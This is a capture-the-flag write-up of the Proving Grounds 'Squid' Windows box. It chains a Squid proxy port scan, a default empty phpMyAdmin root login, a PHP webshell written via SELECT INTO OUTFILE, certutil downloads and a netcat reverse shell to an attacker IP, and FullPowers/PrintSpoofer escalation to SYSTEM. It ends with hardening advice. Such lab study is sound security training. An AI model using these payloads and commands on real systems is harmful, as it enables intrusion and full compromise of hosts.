Box Overview

Squid is a Windows machine from Offensive Security’s Proving Grounds featuring Squid proxy enumeration, PHPMyAdmin exploitation, and privilege escalation through SeImpersonate token abuse using FullPowers and PrintSpoofer.

Enumeration

Nmap Scan

sudo nmap -sS -sC -A 192.168.229.189 -T4 -oN first.scan -p-

Open Ports:

  • 135/tcp - Microsoft Windows RPC
  • 139/tcp - NetBIOS-SSN
  • 445/tcp - SMB
  • 3128/tcp - Squid HTTP Proxy 4.14
  • 49666-49667/tcp - Microsoft Windows RPC

Squid Proxy Enumeration

Port 3128 is running Squid Proxy - a caching and forwarding HTTP proxy.

Challenge: Services behind the proxy are not directly accessible from our attack box.

Proxy Port Scanning

Used spose.py - Squid Proxy Open Port Scanner:

Tool: https://github.com/aancw/spose

python3 spose.py --proxy 192.168.229.189:3128 --target 192.168.229.189

Discovery: Port 8080 is accessible through the proxy! 🎯

Proxy Configuration

FoxyProxy Setup

To access services behind the Squid proxy, configure browser proxy settings:

FoxyProxy Configuration:

  • Proxy Type: HTTP
  • Proxy IP: 192.168.229.189
  • Port: 3128

Enable the proxy and navigate to http://192.168.229.189:8080

Web Application Discovery

Service identified: WampServer (Windows Apache MySQL PHP)

Components:

  • Apache web server
  • MySQL database
  • PHP interpreter
  • PHPMyAdmin web interface

Exploitation - PHPMyAdmin

Default Credentials

Accessed PHPMyAdmin at: http://192.168.229.189:8080/phpmyadmin/

Default credentials attempted:

Username: root
Password: (empty)

Authentication successful!

SQL Injection to Webshell

Web Root Discovery

WAMP default web root: C:\wamp\www\

Webshell Upload via SQL

Navigate to SQL tab and execute:

SELECT '<?php system($_REQUEST["cmd"]); ?>' INTO OUTFILE 'C:/wamp/www/rev.php';

Explanation:

  • SELECT ... INTO OUTFILE - MySQL file writing functionality
  • Creates PHP webshell at web root
  • $_REQUEST["cmd"] - Accepts commands via GET/POST parameter

Webshell deployed!

Initial Access

Webshell Command Execution

Access webshell at: http://192.168.229.189:8080/rev.php?cmd=COMMAND

Test execution:

http://192.168.229.189:8080/rev.php?cmd=whoami
# Output: nt authority\local service

Reverse Shell

Transfer Netcat

# Host nc.exe on Kali
python3 -m http.server 80

# Download via webshell
http://192.168.229.189:8080/rev.php?cmd=certutil -urlcache -split -f http://192.168.45.222:80/nc.exe C:\Users\Public\nc.exe

Setup Listener

nc -nlvp 9001

Execute Reverse Shell

http://192.168.229.189:8080/rev.php?cmd=C:\Users\Public\nc.exe -e cmd.exe 192.168.45.222 9001

Shell caught as NT AUTHORITY\LOCAL SERVICE!

Privilege Assessment

C:\Users\Public> whoami
nt authority\local service

C:\Users\Public> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                    State   
============================= ============================== ========
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled 
SeCreateGlobalPrivilege       Create global objects          Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Issue: LOCAL SERVICE has limited privileges - cannot access Administrator files!

Local Flag

C:\> type local.txt
[local flag]

Local flag captured!

Privilege Escalation

The LOCAL SERVICE Problem

Current user: NT AUTHORITY\LOCAL SERVICE
Missing: SeImpersonatePrivilege and other critical tokens

Solution: Use FullPowers to recover full LOCAL SERVICE privileges!

Stage 1 - FullPowers

Tool: FullPowers by itm4n

Purpose: Recovers the default privilege set of LOCAL/NETWORK SERVICE accounts.

Why FullPowers?

When LOCAL SERVICE spawns processes (like our reverse shell), they inherit a restricted token with minimal privileges. FullPowers exploits Windows Task Scheduler to spawn a new process with the full unrestricted token.

Execution

Transfer FullPowers:

certutil -urlcache -split -f http://192.168.45.222:80/FullPowers.exe C:\Users\Public\FullPowers.exe

Initial attempt (with -x flag):

C:\Users\Public> FullPowers.exe -x
[+] Started dummy thread with id 3684
[+] Successfully created scheduled task.
[-] Couldn't detect task's process start.

Failed to spawn properly.

Successful attempt (no flags):

C:\Users\Public> FullPowers.exe
[+] Started dummy thread with id 2868
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK

New shell spawned with full privileges!

Verify Privileges

C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State  
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token             Enabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Enabled
SeAuditPrivilege              Generate security audits                  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled

SeImpersonatePrivilege obtained! 🎯

Stage 2 - PrintSpoofer

With SeImpersonate privilege, we can now escalate to SYSTEM using PrintSpoofer.

Tool: PrintSpoofer by itm4n

Transfer PrintSpoofer:

certutil -urlcache -split -f http://192.168.45.222:80/PrintSpoofer.exe C:\Users\Public\PrintSpoofer.exe

Execute Privilege Escalation

C:\Users\Public> PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK

SYSTEM shell spawned! 🎯

C:\Windows\system32> whoami
nt authority\system

Proof Flag

C:\Windows\system32> type C:\Users\Administrator\Desktop\proof.txt
09baa1f71587a22fef46df2c553a2545

Root flag captured!

Attack Chain Summary

  1. Port Scanning → Identified Squid proxy on 3128
  2. Proxy Enumeration → Discovered port 8080 behind proxy
  3. Proxy Configuration → Set up FoxyProxy for access
  4. Service Discovery → Found WampServer with PHPMyAdmin
  5. Default Credentials → Authenticated as root (no password)
  6. SQL File Write → Created PHP webshell via INTO OUTFILE
  7. Webshell Access → Executed commands as LOCAL SERVICE
  8. Reverse Shell → Used netcat for interactive shell
  9. FullPowers → Recovered full LOCAL SERVICE privileges
  10. PrintSpoofer → Escalated from LOCAL SERVICE to SYSTEM
  11. System Access → Full domain/system compromise

Technical Deep Dive

Squid Proxy Architecture

[Attacker] → [Squid Proxy :3128] → [Internal Services :8080]

Squid acts as intermediary:

  • Caches HTTP requests
  • Filters/controls access
  • Can hide internal services
  • Access control via ACLs

Enumeration technique:

  • Port scanning through the proxy
  • Connect to proxy, request internal ports
  • Proxy forwards requests internally

PHPMyAdmin SQL Injection

MySQL File Writing

Requirement: FILE privilege on MySQL

SELECT ... INTO OUTFILE '/path/to/file';

Conditions for success:

  1. User has FILE privilege (root has by default)
  2. Secure_file_priv not restricting writes
  3. Web server has write access to target directory
  4. File doesn’t already exist

WAMP Default Configuration

Vulnerabilities:

  • No root password by default
  • PHPMyAdmin accessible remotely
  • Web root writable by Apache user
  • No file upload restrictions

LOCAL SERVICE Token Limitations

Default LOCAL SERVICE process:

  • Stripped token with minimal privileges
  • Missing SeImpersonate
  • Cannot directly escalate to SYSTEM

Child processes inherit:

  • Restricted token
  • Minimal privilege set
  • Limited access rights

FullPowers Exploitation

Technique:

  1. Create scheduled task via Task Scheduler
  2. Task runs as LOCAL SERVICE with unrestricted token
  3. Scheduled task spawns new process
  4. New process inherits full privilege set
  5. SeImpersonate privilege restored

Why it works:

  • Task Scheduler grants full tokens to service accounts
  • Scheduled tasks don’t inherit parent restrictions
  • LOCAL SERVICE can create scheduled tasks

PrintSpoofer Exploitation

Attack Vector: Print Spooler service abuse

Technique:

  1. Create named pipe as LOCAL SERVICE
  2. Trigger Print Spooler to connect
  3. Print Spooler connects as SYSTEM
  4. Impersonate SYSTEM token using SeImpersonate
  5. Spawn process with SYSTEM privileges

Requirements:

  • SeImpersonatePrivilege enabled
  • Print Spooler service running (default)

Remediation

Squid Proxy Hardening

# /etc/squid/squid.conf

# Restrict access by IP
acl localnet src 192.168.1.0/24
http_access allow localnet
http_access deny all

# Disable CONNECT to internal ports
acl Safe_ports port 80 443
http_access deny !Safe_ports

# Hide internal topology
forwarded_for delete
via off

PHPMyAdmin Security

1. Authentication

// config.inc.php
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['AllowNoPassword'] = false;

2. Set MySQL Root Password

ALTER USER 'root'@'localhost' IDENTIFIED BY 'ComplexPassword123!';
FLUSH PRIVILEGES;

3. Restrict File Operations

# my.ini / my.cnf
[mysqld]
secure_file_priv = "C:/mysql/secure_upload/"

4. Network Restrictions

# httpd.conf
<Directory "C:/wamp/www/phpmyadmin">
    Require ip 127.0.0.1 192.168.1.0/24
    Require all denied
</Directory>

Service Account Hardening

1. Disable Unnecessary Privileges

# Remove SeImpersonate if not needed
# Use virtual service accounts instead of LOCAL SERVICE
New-ADServiceAccount -Name WebAppSvc -RestrictToSingleComputer

2. Monitor Token Operations

# Enable audit of privilege use
auditpol /set /subcategory:"Sensitive Privilege Use" /success:enable /failure:enable

# Monitor for FullPowers/PrintSpoofer indicators
Get-WinEvent -FilterHashtable @{LogName='Security';Id=4673,4674}

3. Patch Print Spooler

# Disable Print Spooler if not needed
Stop-Service Spooler
Set-Service Spooler -StartupType Disabled

# Or apply KB patches addressing PrintNightmare

Defense in Depth

  1. Network Segmentation - Isolate proxies and databases
  2. Principle of Least Privilege - Minimal required permissions
  3. Regular Patching - Keep all services updated
  4. Access Control - IP whitelisting and authentication
  5. Monitoring - Log and alert on suspicious activities

Tools Used

  • nmap
  • spose.py (Squid proxy scanner)
  • FoxyProxy (Browser proxy configuration)
  • certutil (File transfer on Windows)
  • netcat
  • FullPowers.exe
  • PrintSpoofer.exe

Techniques

  • Proxy enumeration and port scanning
  • Browser proxy configuration
  • Default credential exploitation
  • SQL file writing to webshell
  • Reverse shell deployment
  • Token privilege recovery (FullPowers)
  • SeImpersonate abuse (PrintSpoofer)

Credits

Box Creator: Offensive Security
Platform: Proving Grounds Practice
Tools: itm4n (FullPowers, PrintSpoofer)

“From proxy to SYSTEM - the journey of a thousand privileges begins with a single enumeration.”